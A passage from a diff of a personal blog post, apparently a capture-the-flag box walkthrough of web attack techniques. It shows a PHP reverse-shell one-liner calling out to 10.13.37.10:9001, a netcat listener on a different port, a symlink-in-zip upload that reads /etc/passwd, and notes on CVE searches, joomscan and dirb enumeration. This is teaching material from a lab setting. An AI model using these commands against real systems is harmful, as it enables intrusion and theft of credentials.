so-w-on/so-w-on.github.io/_posts/2024-01-01-Box Walkthrough.md

 system('bash -c "bash -i >& /dev/tcp/10.13.37.10/9001 0>&1"');
 php>
 ```

 N.B.: make sure you have ran the following command beforehand, to have an active listener on your machine for any incoming connections:
 ```bash
 $ nc -nvlp 9991
 ```
 #### Zip file upload
 In some cases, the security measure in place is a white-listing of certain files.
 One example that I encountered is a webpage that asks specifically for a pdf file in a zip file.
 In this case, I used symlinks.

 The following command creates a link to the file "../../../../../../etc/passwd" and names that link as "document.pdf"
 ```bash
 $ ln -s ../../../../../../etc/passwd document.pdf
 ```

 The next command creates a symlink zip that will be uploaded.
 ```bash
 $ zip --symlinks doc.zip document.pdf
 ```

 After uploading, the webpage provides the url of the file location.

 By inspecting the Network exchange we get a base64 response (stored in "responsebase64characters") that is then deciphered using the following:
 ```bash
 $ echo responsebase64characters | base64 -d
 ```

 ### Known CMS (Content Management System)
-The first thing to do is to google for known vuulnerabilities and exploits.
-To do that we can google "name_of_CMS_version CVE exploit".
+The first thing to do is to search online for known vuulnerabilities and exploits.
+To do that we can search for "name_of_CMS used_version CVE exploit".

 #### Joomla CMS
 When a Joomla CMS based website is encountered, joomscan is a very useful tool that can help us get a lot of information, including credentials that may be used later for privilege escalation.

 ### Brute-force enumeration of directories and files
 This is a technique that uses known wordlists to brute-force for files and directories hosted in the webserver and that aren't directly accessible by the user from the previous webpage.

 These are some commands that help do that:
 ```bash
 $ dirb http://sowon.mold